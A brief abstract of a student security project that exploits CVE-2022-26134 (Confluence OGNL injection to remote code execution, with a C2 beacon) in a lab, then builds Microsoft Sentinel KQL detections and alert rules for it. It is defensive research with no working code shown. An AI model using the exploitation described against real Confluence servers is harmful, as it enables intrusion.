Using Microsoft Sentinel to Detect Confluence…

This student research project documents setting up a vulnerable Atlassian Confluence (v7.13) instance, exploiting CVE-2022-26134 (OGNL injection leading to RCE) using a C2 beacon, and developing Microsoft Sentinel log collection, Kusto parsing functions, KQL detection queries (e.g., URL-encoded '{' detection and unusual Java child processes), and Sentinel alerting rules to detect and group incidents from these exploitation attempts.